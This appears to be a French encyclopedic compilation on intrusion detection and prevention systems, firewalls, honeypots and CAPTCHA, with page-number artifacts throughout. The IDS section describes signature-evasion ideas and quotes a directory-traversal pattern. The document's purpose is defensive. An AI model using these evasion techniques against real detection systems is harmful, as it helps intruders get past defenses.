Signatures Les bibliothèques de signatures (approche par scénario) rendent la démarche d'analyse similaire à celle des antivirus quand ceux-ci s'appuient sur des signatures d'attaques. Ainsi, le NIDS est efficace s'il connaît l'attaque, mais inefficace dans le cas contraire. Les outils commerciaux ou libres ont évolué pour proposer une personnalisation de la signature afin de faire face à des attaques dont on ne connaît qu'une partie des éléments. Les outils à base de signatures requièrent des mises à jour très régulières. Les NIDS ont pour avantage d'être des systèmes temps réel et ont la possibilité de découvrir des attaques ciblant plusieurs machines à la fois. Leurs inconvénients sont le taux élevé de faux positifs qu'ils génèrent, le fait que les signatures aient toujours du retard sur les attaques de type 0day et qu'ils peuvent être la cible d'une attaque.

Alertes Les alertes sont généralement stockées dans les journaux du système. Cependant il existe une norme qui permet d'en formaliser le contenu, afin de permettre à différents éléments de sécurité d'interopérer. Ce format s'appelle IDMEF (pour Intrusion Detection Message Exchange Format) décrit dans la RFC4765 [1]. IDMEF est popularisé par le projet Prelude, qui offre une infrastructure permettant aux IDS de ne pas avoir à s'occuper de l'envoi des alertes. Cela permet aux IDS de n'avoir qu'à décrire les informations qu'il connaît et Prelude se charge de le stocker pour permettre une visualisation humaine ultérieurement.

La recherche de motif (pattern matching) La recherche de motif est ce qui permet à un NIDS de trouver le plus rapidement possible les informations dans un paquet réseau. Il existe différents algorithmes de recherche de motif. Il y a ceux qui sont conçus pour renvoyer des négatifs le plus rapidement possible comme E2xB, d'autres comme Boyer-Moore (BM) qui sont intéressants lorsqu'il y a peu d'informations stockées en mémoire. Il est convenu que BM est plus efficace que les autres quand il y a moins de 100 signatures. Il existe aussi des extensions à Boyer-Moore qui s'affranchissent de ces restrictions. Ou encore des algorithmes qui sont plus précis et donc plus intéressants dans le cas des NIDS comme Knuth-Morris-Pratt (KMP). Dans le cas d'un NIDS, la recherche de motif est souvent le nœud d'étranglement. Pouvant consommer plus de quatre-vingt pourcent de temps de calcul. E2xb a été spécialement conçu pour répondre aux besoins des NIDS. Il s'agit d'un algorithme de recherche de motif de domaine spécifique à la détection d'intrusion. C'est un algorithme d'exclusion car il part du principe que la plupart des paquets réseau ne correspondent pas à une signature qui identifie une tentative d'intrusion.

Analyse À partir des éléments donnés dans l'introduction, le moteur d'analyse met ces éléments de relation en employant plusieurs techniques : la refragmentation, la dissection protocolaire ou encore l'analyse comportementale.

La refragmentation Les paquets dépassant une certaine taille (qui en général est de 1 500 octets) sont fragmentés. La fragmentation de l'en-tête de la couche transport étant aussi possible, cela rendait les NIDS vulnérables aux attaques de Stick et de Snot car les paquets fragmentés n'étaient pas analysés. Les NIDS ont le devoir de refragmenter les paquets avant analyse, afin de ne pas manquer une attaque. Il s'agit d'une opération relativement complexe, étant donné que chaque hôte de destination ne refragmente pas de la même facon, selon le système d'exploitation sur lequel l'attaque est visée. Il s'agit encore d'une technique d'évasion utilisable aujourd'hui car les NIDS ne sont pas forcément configurés correctement pour gérer un cas précis. Système de détection d'intrusion 165

La dissection La dissection permet de comprendre un protocole donné, de le décoder pour l'analyser. Il s'agit de la partie la plus sensibles des NIDS car c'est elle qui est le plus grand vecteur d'attaques. Cependant, la dissection est essentielle sur certains protocoles, comme RPC, afin de pouvoir détecter des attaques qui seraient invisibles sans cette indispensable dissection. Cette étape permet aussi de récupérer un champ précis d'un protocole applicatif ce qui peut simplifier l'écriture de signatures. Dans l'exemple de HTTP, le serveur IIS de Microsoft interprète indifféremment le caractère '/' (slash) comme le caractère '\' (backslash). Ce qui a pour conséquence de permettre à un attaquant l'évasion de signature, si celle-ci cherche à repérer un '/', comme dans le cas d'une traversée de répertoires (../../../../). Une NIDS moderne se doit être capable d'interpréter l'un ou l'autre et se spécialiser sur la cible qui interpretera les données finales. Cet exemple avec les caractère '/' vaut aussi pour les caractères qui peuvent être encodés en UTF-8, voire dans d'autres jeux de caractères que le logiciel finira par interpréter correctement, y compris l'attaque.

HIDS (IDS machine) Les HIDS, pour Host based IDS, signifiant "Système de détection d'intrusion machine" sont des IDS dédiés à un matériel ou système d'exploitation. Généralement, contrairement a un NIDS, le HIDS récupère les informations qui lui sont données par le matériel ou le système d'exploitation. Il y a pour cela plusieurs approches : signatures, comportement (statistiques) ou délimitation du périmètre avec un système d'ACL. Un HIDS se comporte comme un daemon ou un service standard sur un système hôte qui détecte une activité suspecte en s’appuyant sur une norme. Si les activités s’éloignent de la norme, une alerte est générée. La machine peut être surveillée sur plusieurs points : •• Activité de la machine : nombre et listes de processus ainsi que d'utilisateurs, ressources consommées, ... •• Activité de l'utilisateur : horaires et durée des connexions, commandes utilisées, messages envoyés, programmes activés, dépassement du périmètre défini... • Activité malicieuse d'un ver, virus ou cheval de Troie Un autre type d'HIDS cherche les intrusions dans le « noyau » (kernel) du système, et les modifications qui y sont apportées. Certains appellent cette technique « analyse protocolaire ». Très rapide, elle ne nécessite pas de recherche dans une base de signature. Exemples de contrôles pour Windows ... • EPROCESS (structure de données en mode noyau contenant des informations qui peuvent permettre de cacher un processus), • Les processus fonctionnant en mode « noyau » •• Les fonctions logicielles système ou de gestion de périphérique présentes dans l'ordinateur. • La SSDT (System Service Dispatch Table) table utilisée par Windows pour diriger des appels de système vers un traitement approprié : table d'adressage des interruptions. •• etc. Le HIDS a pour avantage de n'avoir que peu de faux positifs, permettant d'avoir des alertes pertinentes. Quant à ses inconvénients il faut configurer un HIDS par poste et demande une configuration de chaque système.

IDS hybride Système de détection d'intrusion 166

Les IDS hybrides sont basés sur une architecture distribuée, où chaque composant unifie son format d'envoi d'alerte (typiquement IDMEF) permettant à des composants divers de communiquer et d'extraire des alertes plus pertinentes. Les avantages des IDS hybrides sont multiples : •• Moins de faux positifs •• Meilleure corrélation •• Possibilité de réaction sur les analyseurs

La corrélation La corrélation est une connexion entre deux ou plusieurs éléments, dont un de ces éléments créée ou influence un autre. Elle se traduit plus généralement par la transformation d'une ou plusieurs alertes en attaque. Cela permet de faciliter la compréhension sur les attaques au lieu de s'éparpiller parmi les alertes. Idéalement, elle nécessite un IDS Hybride car plus il y a d'informations hétérogènes sur un évènement, la corrélation se fait d'une façon plus pertinente. Les formats ayant été normalisés (IDMEF), il ne reste plus qu'à faire des associations afin de détecter des alertes qui n'auraient jamais eu lieu sur un analyseur seul. Si l'on prend l'exemple d'une authentification échouée, cela génère une alerte de faible intensité. Mais s'il y a une série d'authentifications échouées avec des utilisateurs différents, on peut conclure à une attaque de force brute. La corrélation permet de générer de nouvelles alertes à partir de celles existantes. C'est une étape préalable à une contre-mesure efficace. Il y a diverses façons de faire de la corrélation. Cependant on peut définir deux catégories : • La corrélation passive, correspondant à une génération d'alerte basée sur celles existantes. Nous pouvons prendre par exemple les scans de force brute ssh. • La corrélation active, qui va chercher les informations correspondant à des alertes émises. Par exemple, lorsqu'une personne se connecte en dehors des heures de travail, cela a un impact élevé qui n'aurait pas été en temps normal d'activité.

L'harmonisation des formats Le format IDMEF (Intrusion Detection Message Exchange Format) décrit une alerte de façon objet et exhaustive. Une alerte est le message qui est émis depuis un analyseur, qui est une sonde en langage IDMEF, vers un collecteur. Le but d'IDMEF est de proposer un standard permettant d'avoir une communication hétérogène quel que soit l'environnement ou les capacités d'un analyseur donné. Ces alertes sont définies au format XML, offrant une possibilité de validation de chaque message. En général, les implémentations restent binaires, afin d'éviter les problèmes connus d'ajout d'information inutiles en dehors d'XML lorsque l'on envoie un message sur le réseau. IDMEF offre aussi un vocabulaire précis, qu'il est courant d'utiliser dans le domaine de la détection d'intrusions. Par exemple, une classification correspond au nom d'un alerte; Un impact celui d'un niveau d'attaque. Système de détection d'intrusion 167

La contre-mesure

La contre-mesure est l'art de piloter les éléments réseau ou la machine cible, afin d'éviter à une attaque de se propager (Islanding) ou de perdurer. Il s'agit d'une procédure assez compliquée et souvent désactivée. Ce qui rend la contre-mesure difficile, c'est la définition d'une attaque d'un point de vue formel. Il n'est pas possible de se baser sur des éléments qui génèrent des faux positifs. Et cela peut aussi engendrer un autre problème où l'attaquant se fait passer pour un client du réseau en générant des motifs d'attaque. Cela peut même bloquer le réseau interne si la contre-mesure est mal configurée. Un système de contre-mesure se configure en général avec une liste blanche, dans laquelle sont mises les IP du réseau interne.

Liste des IDS connus

IDS réseau (NIDS) •• Snort •• Bro •• Enterasys •• Check Point •• Tipping point

IDS système (HIDS) •• AIDE •• Chkrootkit •• DarkSpy •• FCheck • IceSword (fr) •• Integrit •• Nabou •• OSSEC •• Osiris •• Prelude LML •• Rkhunter •• Rootkit Unhooker •• Samhain Système de détection d'intrusion 168

•• Tripwire Ces IDS servent, entre autres, à vérifier qu'un système n'a pas été compromis (par un rootkit par exemple). Ils utilisent des sommes de contrôle (MD5, SHA-1, …) des programmes exécutables pour s'assurer qu'ils n'ont pas été modifiés.

IDS hybride •• Prelude •• OSSIM

Bibliographie • Thierry Evangelista, Les IDS. Les systèmes de détection d'intrusions informatiques, Dunod/01 Informatique

Références

[1] http:/ / tools. ietf. org/ rfc/ rfc4765. txt

Système de prévention d'intrusion

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Un système de prévention d'intrusion (ou IPS, Intrusion Prevention System) est un outil des spécialistes en sécurité des systèmes d'information, similaire aux IDS, permettant de prendre des mesures afin de diminuer les impacts d'une attaque. C'est un IDS actif, il détecte un balayage automatisé, l'IPS peut bloquer les ports automatiquement. Les IPS peuvent donc parer les attaques connues et inconnues. Comme les IDS, ils ne sont pas fiables à 100 % et risquent même en cas de faux positif de bloquer du trafic légitime.

Fonctionnement des IPS

Types d'IPS •• Les HIPS (Host-based Intrusion Prevention System) qui sont des IPS permettant de surveiller le poste de travail à travers différentes techniques, ils surveillent les processus, les drivers, les .dll etc. En cas de détection de processus suspect le HIPS peut le tuer pour mettre fin à ses agissements. Les HIPS peuvent donc protéger des attaques de buffer overflow. •• Les NIPS (Network Intrusion Prevention System) sont des IPS permettant de surveiller le trafic réseau, ils peuvent prendre des mesures telles que terminer une session TCP. Une déclinaison en WIPS (Wireless Intrusion Prevention System) est parfois utilisée pour évoquer la protection des réseaux sans-fil. •• Il existe aussi les KIPS (Kernel Intrusion Prevention System) qui permettent de détecter toutes tentatives d'intrusion au niveau du noyau, mais ils sont moins utilisés. Système de prévention d'intrusion 169

Les techniques de détection d'intrusion

Les inconvénients de l'IPS Les IPS ne sont pas des logiciels miracle qui vous permettront de surfer en toute quiétude sur le net. Voici quelques-uns de leurs inconvénients : •• Ils bloquent tout ce qui parait infectieux à leurs yeux, mais n'étant pas fiable à 100 % ils peuvent donc bloquer malencontreusement des applications ou des trafics légitimes. •• Ils laissent parfois passer certaines attaques sans les repérer, et permettent donc aux pirates d'attaquer un PC. •• Ils sont peu discrets et peuvent être découverts lors de l'attaque d'un pirate qui une fois qu'il aura découvert l'IPS s'empressera de trouver une faille dans ce dernier pour le détourner et arriver à son but.

Solutions IPS

Libres et OpenSource (Liste triée alphabétiquement) • Bro [1] (Bro IDS - open source) • OSSEC [2] (OSSEC HIPS - open source) • Snort - Inline [3] (IPS reseau) : snort en plus d'être un IDS est également un IPS. • Winpooch [4] (Winpooch - open source)

Propriétaires (Liste triée alphabétiquement) • Arkoon Network Security [5] • Checkpoint [6] •• Cisco Systems • Cyberoam [7] • Demarc Security Inc. [8] • Forescout INC. [9] • Fortinet [10] • HP TippingPoint [11] • Huawei [12] • Internet Security Systems [13] • Intrusion Inc. [14] • Juniper [15] • Lucid Security [16] • McAfee [17] •• NetASQ • NFR Security [18] • NitroSecurity Inc. [19] • Nortel [20] • PaloAltoNetworks Inc. [21] Système de prévention d'intrusion 170

• Radware [22] • Reflex Security [23] • Sonicwall [24] • Sourcefire [25] • Stonesoft [26] • Third Brigade [27] • TopLayer [28]

Sources

• (fr) http:/ / dbprog. developpez. com/ securite/ ids/ IDS. pdf

• (en) http:/ / en. wikipedia. org/ wiki/ Intrusion_prevention_system

Références

[1] http:/ / bro-ids. org/

[2] http:/ / www. ossec. net/

[3] http:/ / www. snort. org/

[4] http:/ / winpooch. free. fr/ page/ home. php?lang=fr& page=home

[5] http:/ / www. arkoon. net/

[6] http:/ / www. checkpoint. com/ products/ ips-software-blade/

[7] http:/ / www. cyberoam. fr

[8] http:/ / www. Demarc. com/

[9] http:/ / www. forescout. com/ index. php?url=solutions& section=intrusion_prevention

[10] http:/ / www. fortinet. com

[11] http:/ / www. tippingpoint. com/

[12] http:/ / www. huawei. com/ fr/

[13] http:/ / www. iss. net/ products_services/ products. php

[14] http:/ / www. intrusion. com/

[15] http:/ / www. juniper. net/ products/ intrusion/

[16] http:/ / www. lucidsecurity. com/

[17] http:/ / mcafee. com

[18] http:/ / www. nfr. com/

[19] http:/ / www. nitrosecurity. com/

[20] http:/ / products. nortel. com/ go/ product_content. jsp?segId=0& parId=0& prod_id=50262& locale=en-US

[21] http:/ / www. paloaltonetworks. com/

[22] http:/ / www. radware. com/

[23] http:/ / www. reflexsecurity. com/

[24] http:/ / www. sonicwall. com/ /

[25] http:/ / www. sourcefire. com/

[26] http:/ / www. stonesoft. com/ fr/

[27] http:/ / www. thirdbrigade. com/

[28] http:/ / www. toplayer. com/ Pare-feu (informatique) 171 Pare-feu (informatique)

Pour les articles homonymes, voir Pare-feu et Firewall. Un pare-feu[1], ou firewall (en anglais), est un logiciel et/ou un matériel, permettant de faire respecter la politique de sécurité du réseau, celle-ci définissant quels sont les types de communication autorisés sur ce réseau informatique. Il mesure la prévention des applications et des paquets.

Un pare-feu, représenté par un mur de briques, pour cloisonner le réseau privé

Terminologie Un pare-feu est parfois appelé coupe-feu, garde-barrière, barrière de sécurité, ou encore firewall. Dans un environnement Unix BSD (Berkeley Software Distribution), un pare-feu est aussi appelé packet filter.

Origine du terme Le terme peut avoir plusieurs origines : • au théâtre le « pare-feu » ou « coupe-feu » est un mécanisme qui permet, une fois déclenché, d'éviter au feu de se propager de la salle vers la scène. • dans le domaine de la lutte contre les incendies, le mot fait référence aux allées pare-feux sont destinées à bloquer les incendies de forêt, et dans le domaine de l'architecture il fait référence aux portes coupe-feux. En informatique l'usage du terme « pare-feu » est donc métaphorique : une porte empêchant les flammes de l'Internet d'entrer chez soi et/ou de « contaminer » un réseau informatique.

Fonctionnement général

Le pare-feu était jusqu'à ces dernières années considéré comme une des pierres angulaires de la sécurité d'un réseau informatique (il perd en importance au fur et à mesure que les communications basculent vers le HTTP sur SSL, court-circuitant tout filtrage). Il permet d'appliquer une politique d'accès aux ressources réseau (serveurs). Il a pour principale tâche de contrôler le trafic entre différentes zones de confiance, en filtrant les flux de données qui y transitent. Généralement, les zones de confiance incluent Internet (une zone dont la confiance est nulle) et au moins un réseau interne (une zone dont la Pare-feu passerelle entre LAN et WAN confiance est plus importante). Le but est de fournir une connectivité contrôlée et maîtrisée entre des zones de différents niveaux de confiance, grâce à l'application de la politique de sécurité et d'un modèle de connexion basé sur le principe du moindre privilège. Le filtrage se fait selon divers critères. Les plus courants sont : Pare-feu (informatique) 172

• l'origine ou la destination des paquets (adresse IP, ports TCP ou UDP, interface réseau, etc.) ; •• les options contenues dans les données (fragmentation, validité, etc.) ; •• les données elles-mêmes (taille, correspondance à un motif, etc.) ; •• les utilisateurs pour les plus récents.

Pare-feu routeur, avec une zone DMZ

Un pare-feu fait souvent office de routeur et permet ainsi d'isoler le réseau en plusieurs zones de sécurité appelées zones démilitarisées ou DMZ. Ces zones sont séparées suivant le niveau de confiance qu'on leur porte. Enfin, le pare-feu est également souvent extrémité de tunnel IPsec ou SSL. L'intégration du filtrage de flux et de la gestion du tunnel est en effet nécessaire pour pouvoir à la fois protéger le trafic en confidentialité et intégrité et filtrer ce qui passe dans le tunnel. C'est le cas notamment de plusieurs produits du commerce nommés dans la liste ci-dessous.

Catégories de pare-feu Les pare-feu sont un des plus vieux équipements de sécurité informatique et, en tant que tels, ils ont été soumis à de nombreuses évolutions. Suivant la génération du pare-feu ou son rôle précis, on peut les classer en différentes catégories.

Pare-feu sans état (stateless firewall) C'est le plus vieux dispositif de filtrage réseau, introduit sur les routeurs. Il regarde chaque paquet indépendamment des autres et le compare à une liste de règles préconfigurées. Ces règles peuvent avoir des noms très différents en fonction du pare-feu : • « ACL » pour Access Control List (certains pare-feu Cisco), • politique ou policy (pare-feu Juniper/Netscreen), •• filtres, • règles ou rules, •• etc. La configuration de ces dispositifs est souvent complexe et l'absence de prise en compte des machines à états des protocoles réseaux ne permet pas d'obtenir une finesse du filtrage très évoluée. Ces pare-feu ont donc tendance à tomber en désuétude mais restent présents sur certains routeurs ou systèmes d'exploitation.

Pare-feu à états (stateful firewall) Certains protocoles dits « à états » comme TCP introduisent une notion de connexion. Les pare-feu à états vérifient la conformité des paquets à une connexion en cours. C’est-à-dire qu'ils vérifient que chaque paquet d'une connexion est bien la suite du précédent paquet et la réponse à un paquet dans l'autre sens. Ils savent aussi filtrer intelligemment les paquets ICMP qui servent à la signalisation des flux IP. Enfin, si les ACL autorisent un paquet UDP caractérisé par un quadruplet (ip_src, port_src, ip_dst, port_dst) à passer, un tel pare-feu autorisera la réponse caractérisée par un quadruplet inversé, sans avoir à écrire une ACL inverse. Ceci est fondamental pour le bon fonctionnement de tous les protocoles fondés sur l'UDP, comme DNS par exemple. Ce mécanisme apporte en fiabilité puisqu'il est plus sélectif quant à la nature du trafic autorisé. Cependant dans le cas d'UDP, cette caractéristique peut être utilisée pour établir des connexions directes (P2P) entre deux Pare-feu (informatique) 173

machines (comme le fait Skype par exemple).

Pare-feu applicatif Dernière mouture de pare-feu, ils vérifient la complète conformité du paquet à un protocole attendu. Par exemple, ce type de pare-feu permet de vérifier que seul du protocole HTTP passe par le port TCP 80. Ce traitement est très gourmand en temps de calcul dès que le débit devient très important. Il est justifié par le fait que de plus en plus de protocoles réseaux utilisent un tunnel TCP afin de contourner le filtrage par ports. Une autre raison de l'inspection applicative est l'ouverture de ports dynamique. Certains protocoles comme le fameux FTP en mode passif échangent entre le client et le serveur des adresses IP ou des ports TCP/UDP. Ces protocoles sont dits « à contenu sale » ou « passant difficilement les pare-feu » car ils échangent au niveau applicatif (FTP) des informations du niveau IP (échange d'adresses) ou du niveau TCP (échange de ports). Ce qui transgresse le principe de la séparation des couches réseaux. Pour cette raison, les protocoles « à contenu sale » passent difficilement voire pas du tout les règles de NAT ...dynamiques, à moins qu'une inspection applicative ne soit faite sur ce protocole. Chaque type de pare-feu sait inspecter un nombre limité d'applications. Chaque application est gérée par un module différent pour pouvoir les activer ou les désactiver. La terminologie pour le concept de module est différente pour chaque type de pare-feu : par exemple : Le protocole HTTP permet d'accéder en lecture sur un serveur par une commande GET, et en écriture par une commande PUT. Un pare-feu applicatif va être en mesure d'analyser une connexion HTTP et de n'autoriser les commandes PUT qu'à un nombre restreint de machines. • Pare-feu applicatif sur DenyAll [2] • Conntrack (suivi de connexion) et l7 Filter (filtrage applicatif) sur Linux Netfilter • CBAC sur Cisco IOS • Fixup puis inspect sur Cisco PIX • ApplicationLayerGateway sur Proventia M, • Predefined Services sur Juniper ScreenOS • Stateful Inspection sur Check Point FireWall-1 • Deep Packet Inspection sur Qosmos [3] • Web Application Firewall sur BinarySEC [4]

Pare-feu identifiant Un pare-réalise l’identification des connexions passant à travers le filtre IP. L'administrateur peut ainsi définir les règles de filtrage par utilisateur et non plus par adresse IP ou adresse MAC, et ainsi suivre l'activité réseau par utilisateur. Plusieurs méthodes différentes existent qui reposent sur des associations entre IP et utilisateurs réalisées par des moyens variés. On peut par exemple citer authpf [5] (sous OpenBSD) qui utilise ssh pour faire l'association. Une autre méthode est l'identification connexion par connexion (sans avoir cette association IP=utilisateur et donc sans compromis sur la sécurité), réalisée par exemple par la suite NuFW, qui permet d'identifier également sur des machines multi-utilisateurs. On pourra également citer Cyberoam qui fournit un pare-feu entièrement basé sur l'identité (en réalité en réalisant des associations adresse MAC = utilisateur) ou Check Point avec l'option NAC Blade qui permet de créer des règles dynamiques basée sur l'authentification Kerberos d'un utilisateur, l'identité de son poste ainsi que son niveau de sécurité (présence d'antivirus, de patchs particuliers). Pare-feu (informatique) 174

Pare-feu personnel Article détaillé : Pare-feu personnel. Les pare-feu personnels, généralement installés sur une machine de travail, agissent comme un pare-feu à états. Bien souvent, ils vérifient aussi quel programme est à l'origine des données. Le but est de lutter contre les virus informatiques et les logiciels espions.

Portail captif Les portails captifs sont des pare-feux dont le but est d'intercepter les usagers d'un réseau de consultation afin de leur présenter une page web spéciale (par exemple : avertissement, charte d'utilisation, demande d'authentification, etc.) avant de les laisser accéder à Internet. Ils sont utilisés pour assurer la traçabilité des connexions et/ou limiter l'utilisation abusive des moyens d'accès. On les déploie essentiellement dans le cadre de réseaux de consultation Internet mutualisés filaires ou Wi-Fi. Article détaillé : Portail captif.

Technologies utilisées Les pare-feu récents embarquent de plus en plus de fonctionnalités, parmi lesquelles on peut citer : •• Filtrage sur adresses IP / protocole, • Inspection stateful[6] et applicative, •• Intelligence artificielle pour détecter le trafic anormal, •• Filtrage applicatif : • HTTP (restriction des URL accessibles), • Courriel (Anti-pourriel), • Logiciel antivirus, anti-logiciel malveillant • Traduction d'adresse réseau, • Tunnels IPsec, PPTP, L2TP, •• Identification des connexions, • Serveurs de protocoles de connexion (telnet, SSH), de protocoles de transfert de fichier (SCP), • Clients de protocoles de transfert de fichier (TFTP), •• Serveur Web pour offrir une interface de configuration agréable, • Serveur mandataire (« proxy » en anglais), • Système de détection d'intrusion (« IDS » en anglais) • Système de prévention d'intrusion (« IPS » en anglais)

Notes et références

[1] Terme recommandé par la Commission générale de terminologie et de néologie, et couramment employé, chercher "firewall" dans

FranceTerme (http:/ / franceterme. culture. fr/ FranceTerme/ )

[2] http:/ / www. denyall. com

[3] http:/ / www. qosmos. com

[4] http:/ / www. binarysec. com

[5] http:/ / www. openbsd. org/ faq/ pf/ authpf. html

[6] Stateful Inspection est une technologie inventée et déposée par Check Point Software Technologie Stateful Inspection (http:/ / www.

checkpoint. com/ products/ downloads/ Stateful_Inspection. pdf) Honeypot 175 Honeypot

Dans le jargon de la sécurité informatique, un honeypot, ou pot de miel, est un ordinateur ou un programme volontairement vulnérable destiné à attirer et à piéger les crackers (souvent qualifiés à tort de hackers), ou plus généralement, leurs bots malveillants.

Principes de fonctionnement Le but de ce leurre est de faire croire à l'intrus qu'il peut prendre le contrôle d'une véritable machine de production, ce qui va permettre d'observer les moyens de compromission des attaquants, de se prémunir contre de nouvelles attaques et de laisser ainsi un temps supplémentaire de réaction à l’administrateur. Une utilisation correcte d’un honeypot repose essentiellement sur la résolution et la mise en parallèle de trois problématiques : •• la surveillance ; •• la collecte d'information ; •• l'analyse d'information.

Surveillance Il faut partir du principe que toute information circulant sur le réseau à destination ou non du honeypot est importante. De ce fait, la surveillance doit absolument être constante et doit porter aussi bien au niveau local qu’au niveau distant. Cette surveillance de tous les instants repose sur : •• l'analyse du trafic réseau ; •• l'analyse pré compromission ; •• la journalisation des événements.

Collecte d'informations La collecte d’informations est possible grâce à des outils appelés renifleurs qui étudient les paquets présents sur le réseau et stockent les événements dans des bases de données. On peut également collecter des informations brutes grâce à des analyseurs de trames.

Analyse d'informations C'est grâce à l'analyse des informations recueillies que l'on va pouvoir découvrir les défaillances du réseau à protéger et les motivations des attaquants.

Différents types de honeypot On compte deux types de honeypots qui ont des buts et des fonctionnalités bien distincts : •• Les honeypots à faible interaction ; •• Les honeypots à forte interaction.

Honeypots à faible interaction Ils sont les plus simples de la famille des honeypots. Leur but est de récolter un maximum d’informations tout en limitant les risques en offrant un minimum de privilèges aux attaquants. On peut ranger, par exemple, la commande netcat dans cette catégorie. Honeypot 176

Netcat peut écouter un port particulier et enregistrer dans un journal toutes les connexions, ainsi que les commandes entrées. Ce programme permet donc d'écrire dans un fichier toutes les commandes entrées par des agresseurs. Cependant, ce type d’écoute reste très limité car il faut exécuter la commande pour chaque port que l'on souhaite observer. Dans la même famille, on pourra citer : • Honeyd de Niels Provost qui est un honeypot virtuel capable d’émuler des machines ou un réseau virtuel dans le but de leurrer les hackers. C’est l’un des honeypots à faible interaction qui offre le plus de possibilités. • Specter qui permet d’émuler des services classiques (web, FTP, etc.). Il ne permet pas un accès total sur un système d’exploitation à l’attaquant ce qui limite son intérêt.

Honeypots à forte interaction Ce type de honeypots peut être considéré comme le côté extrême du sujet puisqu’il repose sur le principe de l’accès à de véritables services sur une machine du réseau plus ou moins sécurisée. Les risques sont beaucoup plus importants que pour les honeypots à faible interaction. Il apparaît donc nécessaire de sécuriser au maximum l’architecture du réseau pour que l’attaquant ne puisse pas rebondir et s’en prendre à d’autres machines. Les deux grands principes d’un tel honeypot sont : • le contrôle de données : pour observer le maximum d’attaques, le honeypot à forte interaction doit accepter toutes les connexions entrantes et au contraire limiter les connexions sortantes pour éviter tout débordement. Cependant, il ne faut en aucun cas interdire toutes les connexions sortantes pour ne pas alerter l'attaquant. Un bon compromis entre sécurité et risque de découverte du leurre est donc nécessaire. • la capture des données : avec un pare-feu ou un système de détection d'intrusion (SDI). • le pare-feu permet de loguer et de rediriger toutes les tentatives d’attaque aussi bien internes qu’externes. • le SDI permet d’enregistrer tous les paquets circulant pour pouvoir reconstruire la séquence d’attaque. Il peut permettre également, grâce aux iptables, de rediriger les paquets compromis vers le honeypot. Il vient donc en complément d’un pare-feu et sert également de sauvegarde au cas où celui-ci tomberait. •• les informations générées seront redirigées vers une machine distante et non stockées sur la machine compromise en raison du risque de compromission de ces données. Il faut également relever l’existence de honeypots plus spécifiques comme les honeypots anti-spam ou anti-virus.

Projets en cours Un grand nombre de projets sur les honeypots ont vu le jour pour collecter des informations sur les outils utilisés par les attaquants, leurs méthodes d’attaque et les failles de sécurité qu’ils exploitent mais aussi et surtout leurs motivations.

The Honeynet Project Dans cette perspective a débuté en juin 2000 le Honeynet Project [1], projet lancé par une association à but non lucratif composée de professionnels de la sécurité informatique. Leur philosophie est « connais ton ennemi » en référence à l'Art de la guerre. The Honeynet Project n'est cependant pas le Project Honey Pot, qui est un projet différent et plus récent[2]. Leurs objectifs sont : • Faire prendre conscience de la réalité des menaces provenant d’Internet ; •• Enseigner et informer, donner toutes les informations nécessaires pour améliorer la protection des ressources ; •• Diffuser leurs outils et stimuler la recherche pour accroître leur potentiel de recherche. Honeypot 177

Autres projets On notera aussi d'autres projets intéressants : • HOSUS (HOneypot SUrveillance System) de Lance Spitzner. • Honeypots : Monitoring and Forensics de Ryan Barnet. • Florida Honeynet Project. • (en) Network of Affined Honeypots (NoAH) Project [3]

Notes et références

[1] http:/ / project. honeynet. org/

[2] Page d'accueil du ' (http:/ / www. projecthoneypot. org)

[3] http:/ / www. fp6-noah. org/

CAPTCHA

Un CAPTCHA est une forme de test de Turing permettant de différencier de manière automatisée un utilisateur humain d'un ordinateur. C'est un test de défi-réponse utilisé dans le domaine de l'informatique, ayant pour but de Ce captcha de « smwm » rend difficile son interprétation par un ordinateur, en s'assurer qu'une réponse n'est pas générée par modifiant la forme des lettres et en ajoutant un dégradé de couleur en fond. Ces un ordinateur. L'acronyme « CAPTCHA » est procédés peuvent cependant compromettre la reconnaissance des caractères par un humain. basé sur le mot capture, et vient de l'anglais completely automated public Turing test to tell computers and humans apart[1].

Parce que le test est réalisé par un ordinateur, en opposition avec les tests de Turing standard réalisés par des humains, un captcha est Captcha plus récent (reCAPTCHA) : plutôt que d'utiliser un dégradé du fond et souvent décrit comme un test de Turing une distorsion des lettres, la segmentation est rendue difficile par l'ajout d'une inversé. Ce terme est néanmoins ambigu parce ligne brisée. qu’il pourrait aussi signifier que les participants essaient de prouver qu'ils sont des ordinateurs.

Applications

Ce test est utilisé sur Internet dans les Un autre moyen de rendre la segmentation difficile est d'imbriquer les lettres les unes dans les autres, comme dans le format actuel de captcha de Yahoo. formulaires pour se prémunir contre les soumissions automatisées et intensives réalisées par des robots malveillants. La vérification utilise la capacité d'analyse d'image ou de son de l'être humain. Un captcha usuel requiert ainsi que l'utilisateur CAPTCHA 178

tape les lettres et les chiffres visibles sur une image distordue qui apparaît à l'écran. Certains sites web préfèrent afficher une image qui contient une question mathématique. Ils sont utilisés : • contre le spam : Le CAPTCHA utilisé sur wikipédia sont des lettres brouillées et déformées. • lors de l'inscription à des webmails gratuits (dont les comptes pourraient être utilisés par la suite pour l'envoi de courriers non sollicités), • lors de la soumission de messages dans des forums de discussion et des blogs (qui pourraient permettre de faire du référencement abusif), etc. ; • contre l'extraction automatisée de bases de données ; • contre les tentatives d'attaque par force brute ; • pour la participation à des sondages (dont les résultats pourraient être faussés par des votes automatisés).

À propos du nom « Captcha » est un rétroacronyme : le mot se prononce comme capture en anglais américain et est censé être composé des initiales de Completely Automated Public Turing test to Tell Computers and Humans Apart, soit en français, « test public de Turing complètement automatique ayant pour but de différencier les humains des ordinateurs ». Ce terme, qui est une marque déposée par l'université Carnegie-Mellon, a été inventé en 2000 par Luis von Ahn, Manuel Blum et Nicholas J. Hopper de cette université, et par John Langford d'IBM. Le nom "captcha" peut également être interprété comme "capture character" (capture de caractères).

